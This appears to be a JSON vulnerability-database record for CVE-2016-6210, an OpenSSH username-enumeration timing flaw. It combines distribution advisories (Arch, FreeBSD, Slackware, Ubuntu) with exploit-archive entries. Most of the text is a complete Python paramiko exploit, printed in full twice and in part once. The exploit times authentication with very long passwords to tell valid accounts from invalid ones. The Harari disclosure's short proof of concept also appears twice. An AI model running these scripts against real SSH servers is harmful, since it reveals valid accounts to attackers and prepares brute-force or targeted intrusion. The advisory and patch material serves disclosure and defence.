str(port) + bcolors.ENDC + \", Banner: \" + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC) \n# get baseline timing for non-existing users... 
\nbaseline_samples = [] \nbaseline_mean = 0.0 \nbaseline_deviation = 0.0 \nif not args.silent: sys.stdout.write(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Getting baseline timing for authenticating non-existing users\") \nfor i in range(1, int(args.samples) + 1): \nif not args.silent: sys.stdout.write('.') \nif not args.silent: sys.stdout.flush() \nsample = connect(host, port, 'foobar-bleh-nonsense' + str(i)) \nbaseline_samples.append(sample) \nif not args.silent: sys.stdout.write('\\n') \n# remove the biggest and smallest value \nbaseline_samples.sort() \nbaseline_samples.pop() \nbaseline_samples.reverse() \nbaseline_samples.pop() \n# do math \nbaseline_mean = numpy.mean(numpy.array(baseline_samples)) \nbaseline_deviation = numpy.std(numpy.array(baseline_samples)) \nif not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline mean for host \" + host + \" is \" + str(baseline_mean) + \" seconds.\") \nif not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline variation for host \" + host + \" is \" + str(baseline_deviation) + \" seconds.\") \nupper = baseline_mean + float(args.factor) * baseline_deviation \nif not args.silent: print(bcolors.WARNING + \"[*] \" + bcolors.ENDC + \"Defining timing of x < \" + str(upper) + \" as non-existing user.\") \nif not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing your users...\") \n# \n# Get timing for the given user name... 
\n# \nfor u in users: \nuser = u.strip() \nenum_samples = [] \nenum_mean = 0.0 \nfor t in range(0, int(args.trials)): \ntimeval = connect(host, port, user) \nenum_samples.append(timeval) \nenum_mean = numpy.mean(numpy.array(enum_samples)) \nif (enum_mean < upper): \nif not (args.enumerated or args.silent) : \nprint(bcolors.FAIL + \"[-] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean)) \nelse: \nif not args.silent: \nprint(bcolors.OKGREEN + \"[+] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean)) \nelse: \nprint(user) \n \n \n \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/138006/opensshd72p2-enumerate.txt"}], "archlinux": [{"lastseen": "2016-09-02T18:44:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "Mitigate timing differences in password authentication that could be\nused to discern valid from invalid account names when long passwords\nwere sent and particular password hashing algorithms are in use on the\nserver. 
Reported by EddieEzra.Harari at verint.com", "modified": "2016-08-02T00:00:00", "published": "2016-08-02T00:00:00", "id": "ASA-201608-1", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-August/000675.html", "type": "archlinux", "title": "openssh: information leakage", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-09T21:04:52", "edition": 2, "description": "Exploit for linux platform in category remote exploits", "published": "2016-07-18T00:00:00", "type": "zdt", "title": "OpenSSHd 7.2p2 - Username Enumeration (1)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-18T00:00:00", "id": "1337DAY-ID-25438", "href": "https://0day.today/exploit/description/25438", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\r\n \r\n--------------------------------------------------------------------\r\nUser Enumeration using Open SSHD (<=Latest version).\r\n-------------------------------------------------------------------\r\n \r\nAbstract:\r\n-----------\r\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \r\nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\r\n \r\nCVE-ID\r\n---------\r\nCVE-2016-6210\r\n \r\nTested versions\r\n--------------------\r\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\r\n \r\nFix\r\n-----------------\r\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\r\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\r\n \r\nDetails\r\n----------------\r\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \r\nsource code. 
On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\r\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \r\nresponse time from the server for non-existing users.\r\n \r\nSample code:\r\n----------------\r\nimport paramiko\r\nimport time\r\nuser=raw_input(\"user: \")\r\np='A'*25000\r\nssh = paramiko.SSHClient()\r\nstarttime=time.clock()\r\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\ntry:\r\n ssh.connect('127.0.0.1', username=user,\r\n password=p)\r\nexcept:\r\n endtime=time.clock()\r\ntotal=endtime-starttime\r\nprint(total)\r\n \r\n(Valid users will result in higher total time).\r\n \r\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\r\n \r\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \r\npackets of the server, since this will eliminate any network delays on the way.\r\n \r\nEddie Harari\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25438"}, {"lastseen": "2018-01-03T05:01:25", "edition": 2, "description": "Exploit for linux platform in category remote exploits", "published": "2016-07-20T00:00:00", "type": "zdt", "title": "OpenSSHd 7.2p2 - Username Enumeration (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-20T00:00:00", "id": "1337DAY-ID-25440", "href": "https://0day.today/exploit/description/25440", "sourceData": "#!/usr/bin/python\r\n#\r\n# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)\r\n#\r\n# Author: 0_o -- null_null\r\n# nu11.nu11 [at] yahoo.com\r\n# Oh, and it is n-u-one-one.n-u-one-one, no l's...\r\n# Wonder how the guys at packet storm could get this wrong :(\r\n# \r\n# Date: 2016-07-19\r\n# \r\n# Purpose: User name enumeration against SSH 
daemons affected by CVE-2016-6210. \r\n# \r\n# Prerequisites: Network access to the SSH daemon.\r\n#\r\n# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not \r\n# permitted to may put you in big trouble!\r\n#\r\n# And now - the fun part :-)\r\n# \r\n \r\n \r\nimport paramiko\r\nimport time\r\nimport numpy\r\nimport argparse\r\nimport sys\r\n \r\nargs = None\r\n \r\nclass bcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n \r\n \r\ndef get_args():\r\n parser = argparse.ArgumentParser()\r\n group = parser.add_mutually_exclusive_group()\r\n parser.add_argument(\"host\", type = str, help = \"Give SSH server address like ip:port or just by ip\")\r\n group.add_argument(\"-u\", \"--user\", type = str, help = \"Give a single user name\")\r\n group.add_argument(\"-U\", \"--userlist\", type = str, help = \"Give a file containing a list of users\")\r\n parser.add_argument(\"-e\", \"--enumerated\", action = \"store_true\", help = \"Only show enumerated users\")\r\n parser.add_argument(\"-s\", \"--silent\", action = \"store_true\", help = \"Like -e, but just the user names will be written to stdout (no banner, no anything)\")\r\n parser.add_argument(\"--bytes\", default = 50000, type = int, help = \"Send so many BYTES to the SSH daemon as a password\")\r\n parser.add_argument(\"--samples\", default = 12, type = int, help = \"Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users\")\r\n parser.add_argument(\"--factor\", default = 3.0, type = float, help = \"Used to compute the upper timing boundary for user enumeration\")\r\n parser.add_argument(\"--trials\", default = 1, type = int, help = \"try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary\")\r\n args = parser.parse_args()\r\n return args\r\n \r\n \r\ndef 
get_banner(host, port):\r\n ssh = paramiko.SSHClient()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n try:\r\n ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')\r\n except:\r\n banner = ssh.get_transport().remote_version\r\n ssh.close()\r\n return banner\r\n \r\n \r\ndef connect(host, port, user):\r\n global args\r\n starttime = 0.0\r\n endtime = 0.0\r\n p = 'B' * int(args.bytes)\r\n ssh = paramiko.SSHClient()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n starttime=time.clock()\r\n try:\r\n ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)\r\n except:\r\n endtime=time.clock()\r\n finally:\r\n ssh.close()\r\n return endtime - starttime\r\n \r\n \r\n \r\ndef main():\r\n global args\r\n args = get_args()\r\n if not args.silent: print(\"\\n\\nUser name enumeration against SSH daemons affected by CVE-2016-6210\")\r\n if not args.silent: print(\"Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\\n\\n\")\r\n if args.host:\r\n host = args.host.split(\":\")[0]\r\n try:\r\n port = int(args.host.split(\":\")[1])\r\n except IndexError:\r\n port = 22\r\n users = []\r\n if args.user:\r\n users.append(args.user)\r\n elif args.userlist:\r\n with open(args.userlist, \"r\") as f:\r\n users = f.readlines()\r\n else:\r\n if not args.silent: print(bcolors.FAIL + \"[!] 
\" + bcolors.ENDC + \"You must give a user or a list of users\")\r\n sys.exit()\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing SSHD at: \" + bcolors.BOLD + str(host) + \":\" + str(port) + bcolors.ENDC + \", Banner: \" + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)\r\n # get baseline timing for non-existing users...\r\n baseline_samples = []\r\n baseline_mean = 0.0\r\n baseline_deviation = 0.0\r\n if not args.silent: sys.stdout.write(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Getting baseline timing for authenticating non-existing users\")\r\n for i in range(1, int(args.samples) + 1):\r\n if not args.silent: sys.stdout.write('.')\r\n if not args.silent: sys.stdout.flush()\r\n sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))\r\n baseline_samples.append(sample)\r\n if not args.silent: sys.stdout.write('\\n')\r\n # remove the biggest and smallest value\r\n baseline_samples.sort()\r\n baseline_samples.pop()\r\n baseline_samples.reverse()\r\n baseline_samples.pop()\r\n # do math\r\n baseline_mean = numpy.mean(numpy.array(baseline_samples))\r\n baseline_deviation = numpy.std(numpy.array(baseline_samples))\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline mean for host \" + host + \" is \" + str(baseline_mean) + \" seconds.\")\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline variation for host \" + host + \" is \" + str(baseline_deviation) + \" seconds.\")\r\n upper = baseline_mean + float(args.factor) * baseline_deviation\r\n if not args.silent: print(bcolors.WARNING + \"[*] \" + bcolors.ENDC + \"Defining timing of x < \" + str(upper) + \" as non-existing user.\")\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing your users...\")\r\n # \r\n # Get timing for the given user name...\r\n #\r\n for u in users:\r\n user = u.strip()\r\n enum_samples = []\r\n enum_mean = 0.0\r\n for t in range(0, int(args.trials)):\r\n 
timeval = connect(host, port, user)\r\n enum_samples.append(timeval)\r\n enum_mean = numpy.mean(numpy.array(enum_samples))\r\n if (enum_mean < upper):\r\n if not (args.enumerated or args.silent) : \r\n print(bcolors.FAIL + \"[-] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\r\n else:\r\n if not args.silent: \r\n print(bcolors.OKGREEN + \"[+] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\r\n else: \r\n print(user)\r\n \r\n \r\n \r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25440"}], "exploitdb": [{"lastseen": "2016-07-20T21:22:08", "description": "OpenSSHD. CVE-2016-6210. Remote exploit for Linux platform", "published": "2016-07-20T00:00:00", "type": "exploitdb", "title": "OpenSSHD <= 7.2p2 - Username Enumeration", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-20T00:00:00", "id": "EDB-ID:40136", "href": "https://www.exploit-db.com/exploits/40136/", "sourceData": "#!/usr/bin/python\r\n#\r\n# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)\r\n#\r\n# Author: 0_o -- null_null\r\n# nu11.nu11 [at] yahoo.com\r\n# Oh, and it is n-u-one-one.n-u-one-one, no l's...\r\n# Wonder how the guys at packet storm could get this wrong :(\r\n# \r\n# Date: 2016-07-19\r\n# \r\n# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. \r\n# \r\n# Prerequisites: Network access to the SSH daemon.\r\n#\r\n# DISCLAIMER: Use against your own hosts only! 
Attacking stuff you are not \r\n# permitted to may put you in big trouble!\r\n#\r\n# And now - the fun part :-)\r\n# \r\n\r\n\r\nimport paramiko\r\nimport time\r\nimport numpy\r\nimport argparse\r\nimport sys\r\n\r\nargs = None\r\n\r\nclass bcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser()\r\n group = parser.add_mutually_exclusive_group()\r\n parser.add_argument(\"host\", type = str, help = \"Give SSH server address like ip:port or just by ip\")\r\n group.add_argument(\"-u\", \"--user\", type = str, help = \"Give a single user name\")\r\n group.add_argument(\"-U\", \"--userlist\", type = str, help = \"Give a file containing a list of users\")\r\n parser.add_argument(\"-e\", \"--enumerated\", action = \"store_true\", help = \"Only show enumerated users\")\r\n parser.add_argument(\"-s\", \"--silent\", action = \"store_true\", help = \"Like -e, but just the user names will be written to stdout (no banner, no anything)\")\r\n parser.add_argument(\"--bytes\", default = 50000, type = int, help = \"Send so many BYTES to the SSH daemon as a password\")\r\n parser.add_argument(\"--samples\", default = 12, type = int, help = \"Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users\")\r\n parser.add_argument(\"--factor\", default = 3.0, type = float, help = \"Used to compute the upper timing boundary for user enumeration\")\r\n parser.add_argument(\"--trials\", default = 1, type = int, help = \"try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary\")\r\n args = parser.parse_args()\r\n return args\r\n\r\n\r\ndef get_banner(host, port):\r\n ssh = paramiko.SSHClient()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n try:\r\n ssh.connect(hostname = host, 
port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')\r\n except:\r\n banner = ssh.get_transport().remote_version\r\n ssh.close()\r\n return banner\r\n\r\n\r\ndef connect(host, port, user):\r\n global args\r\n starttime = 0.0\r\n endtime = 0.0\r\n p = 'B' * int(args.bytes)\r\n ssh = paramiko.SSHClient()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n starttime=time.clock()\r\n try:\r\n ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)\r\n except:\r\n endtime=time.clock()\r\n finally:\r\n ssh.close()\r\n return endtime - starttime\r\n\r\n\r\n\r\ndef main():\r\n global args\r\n args = get_args()\r\n if not args.silent: print(\"\\n\\nUser name enumeration against SSH daemons affected by CVE-2016-6210\")\r\n if not args.silent: print(\"Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\\n\\n\")\r\n if args.host:\r\n host = args.host.split(\":\")[0]\r\n try:\r\n port = int(args.host.split(\":\")[1])\r\n except IndexError:\r\n port = 22\r\n users = []\r\n if args.user:\r\n users.append(args.user)\r\n elif args.userlist:\r\n with open(args.userlist, \"r\") as f:\r\n users = f.readlines()\r\n else:\r\n if not args.silent: print(bcolors.FAIL + \"[!] 
\" + bcolors.ENDC + \"You must give a user or a list of users\")\r\n sys.exit()\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing SSHD at: \" + bcolors.BOLD + str(host) + \":\" + str(port) + bcolors.ENDC + \", Banner: \" + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)\r\n # get baseline timing for non-existing users...\r\n baseline_samples = []\r\n baseline_mean = 0.0\r\n baseline_deviation = 0.0\r\n if not args.silent: sys.stdout.write(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Getting baseline timing for authenticating non-existing users\")\r\n for i in range(1, int(args.samples) + 1):\r\n if not args.silent: sys.stdout.write('.')\r\n if not args.silent: sys.stdout.flush()\r\n sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))\r\n baseline_samples.append(sample)\r\n if not args.silent: sys.stdout.write('\\n')\r\n # remove the biggest and smallest value\r\n baseline_samples.sort()\r\n baseline_samples.pop()\r\n baseline_samples.reverse()\r\n baseline_samples.pop()\r\n # do math\r\n baseline_mean = numpy.mean(numpy.array(baseline_samples))\r\n baseline_deviation = numpy.std(numpy.array(baseline_samples))\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline mean for host \" + host + \" is \" + str(baseline_mean) + \" seconds.\")\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline variation for host \" + host + \" is \" + str(baseline_deviation) + \" seconds.\")\r\n upper = baseline_mean + float(args.factor) * baseline_deviation\r\n if not args.silent: print(bcolors.WARNING + \"[*] \" + bcolors.ENDC + \"Defining timing of x < \" + str(upper) + \" as non-existing user.\")\r\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing your users...\")\r\n # \r\n # Get timing for the given user name...\r\n #\r\n for u in users:\r\n user = u.strip()\r\n enum_samples = []\r\n enum_mean = 0.0\r\n for t in range(0, int(args.trials)):\r\n 
timeval = connect(host, port, user)\r\n enum_samples.append(timeval)\r\n enum_mean = numpy.mean(numpy.array(enum_samples))\r\n if (enum_mean < upper):\r\n if not (args.enumerated or args.silent) : \r\n print(bcolors.FAIL + \"[-] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\r\n else:\r\n if not args.silent: \r\n print(bcolors.OKGREEN + \"[+] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\r\n else: \r\n print(user)\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40136/"}, {"lastseen": "2016-07-18T13:28:25", "description": "OpenSSHD <= 7.2p2 - User Enumeration. CVE-2016-6210. Remote exploit for Linux platform", "published": "2016-07-18T00:00:00", "type": "exploitdb", "title": "OpenSSHD <= 7.2p2 - User Enumeration", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-18T00:00:00", "id": "EDB-ID:40113", "href": "https://www.exploit-db.com/exploits/40113/", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\r\n\r\n--------------------------------------------------------------------\r\nUser Enumeration using Open SSHD (<=Latest version).\r\n-------------------------------------------------------------------\r\n\r\nAbstract:\r\n-----------\r\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. 
This problem exists in most \r\nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\r\n\r\nCVE-ID\r\n---------\r\nCVE-2016-6210\r\n\r\nTested versions\r\n--------------------\r\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\r\n\r\nFix\r\n-----------------\r\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\r\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\r\n\r\nDetails\r\n----------------\r\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \r\nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\r\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \r\nresponse time from the server for non-existing users.\r\n\r\nSample code:\r\n----------------\r\nimport paramiko\r\nimport time\r\nuser=raw_input(\"user: \")\r\np='A'*25000\r\nssh = paramiko.SSHClient()\r\nstarttime=time.clock()\r\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\ntry:\r\n ssh.connect('127.0.0.1', username=user,\r\n password=p)\r\nexcept:\r\n endtime=time.clock()\r\ntotal=endtime-starttime\r\nprint(total)\r\n\r\n(Valid users will result in higher total time).\r\n\r\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\r\n\r\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \r\npackets of the server, since this will eliminate any network delays on the way.\r\n\r\nEddie Harari", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40113/"}], "freebsd": [{"lastseen": "2019-05-29T18:32:32", "bulletinFamily": "unix", "cvelist": 
["CVE-2015-8325", "CVE-2016-6210"], "description": "\nThe OpenSSH project reports:\n\n* sshd(8): Mitigate timing differences in password authentication\n\t that could be used to discern valid from invalid account names\n\t when long passwords were sent and particular password hashing\n\t algorithms are in use on the server. CVE-2016-6210, reported by\n\t EddieEzra.Harari at verint.com\n\t \n * sshd(8): (portable only) Ignore PAM environment vars when\n\t UseLogin=yes. If PAM is configured to read user-specified\n\t environment variables and UseLogin=yes in sshd_config, then a\n\t hostile local user may attack /bin/login via LD_PRELOAD or\n\t similar environment variables set via PAM. CVE-2015-8325,\n\t found by Shayan Sadigh.\n\t \n\n", "edition": 4, "modified": "2016-08-01T00:00:00", "published": "2016-08-01T00:00:00", "id": "ADCCEFD1-7080-11E6-A2CB-C80AA9043978", "href": "https://vuxml.freebsd.org/freebsd/adccefd1-7080-11e6-a2cb-c80aa9043978.html", "title": "openssh -- sshd -- remote valid user discovery and PAM /bin/login attack", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8325", "CVE-2016-6210"], "description": "New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/openssh-7.3p1-i586-1_slack14.2.txz: Upgraded.\n This is primarily a bugfix release, and also addresses security issues.\n sshd(8): Mitigate a potential denial-of-service attack against the system's\n crypt(3) function via sshd(8).\n sshd(8): Mitigate timing differences in password authentication that could\n be used to discern valid from invalid account names when long passwords were\n sent and particular password hashing algorithms are in use on the server.\n ssh(1), sshd(8): Fix observable timing weakness in the 
CBC padding oracle\n countermeasures.\n ssh(1), sshd(8): Improve operation ordering of MAC verification for\n Encrypt-then-MAC (EtM) mode transport MAC algorithms to verify the MAC\n before decrypting any ciphertext.\n sshd(8): (portable only) Ignore PAM environment vars when UseLogin=yes.\n For more information, see:\n http://www.openssh.com/txt/release-7.3\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6210\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8325\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.3p1-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.3p1-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.3p1-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.3p1-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.3p1-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.3p1-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.3p1-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 
14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.3p1-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.3p1-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.3p1-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssh-7.3p1-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssh-7.3p1-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.3p1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.3p1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n926a45f63599a8f7d559039220f2773c openssh-7.3p1-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n2f18a3adf8ed54e59ac0c0740b138a67 openssh-7.3p1-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n7f5e48238b26237b9c2542a3d34847b6 openssh-7.3p1-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ne277d7c7865fd46bc48ac128849d6426 openssh-7.3p1-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n17c49c75c5d2b6ad49e0d2352fd2e922 openssh-7.3p1-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n6305b5ce1ce3a4390a56c36eca6920cc openssh-7.3p1-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n508dbde12ca36275d305ad1014f12066 openssh-7.3p1-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n699e2c1d8d7383ba2137e9ead9001be2 openssh-7.3p1-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n6a2a5dca4d9334c70239c20bfed92791 openssh-7.3p1-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\neb14e40f2c50beb19ccf1aaccbaf416d 
openssh-7.3p1-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n624fbc40486642443292ffdaaffba640 openssh-7.3p1-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nc0e4d51dfb3722aa69e008389f4f089d openssh-7.3p1-x86_64-1_slack14.2.txz\n\nSlackware -current package:\ne9109896f7640f872e3695603579954f n/openssh-7.3p1-i586-1.txz\n\nSlackware x86_64 -current package:\nbcf65b51088b5b7f1dc55bab1ef63684 n/openssh-7.3p1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg openssh-7.3p1-i586-1_slack14.2.txz\n\nNext, restart the sshd daemon:\n > sh /etc/rc.d/rc.sshd restart", "modified": "2016-08-06T21:10:35", "published": "2016-08-06T21:10:35", "id": "SSA-2016-219-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.613746", "type": "slackware", "title": "[slackware-security] openssh", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:39:38", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6515", "CVE-2016-6210"], "description": "Eddie Harari discovered that OpenSSH incorrectly handled password hashing \nwhen authenticating non-existing users. A remote attacker could perform a \ntiming attack and enumerate valid users. (CVE-2016-6210)\n\nTomas Kuthan, Andres Rojas, and Javier Nieto discovered that OpenSSH did \nnot limit password lengths. A remote attacker could use this issue to cause \nOpenSSH to consume resources, leading to a denial of service. 
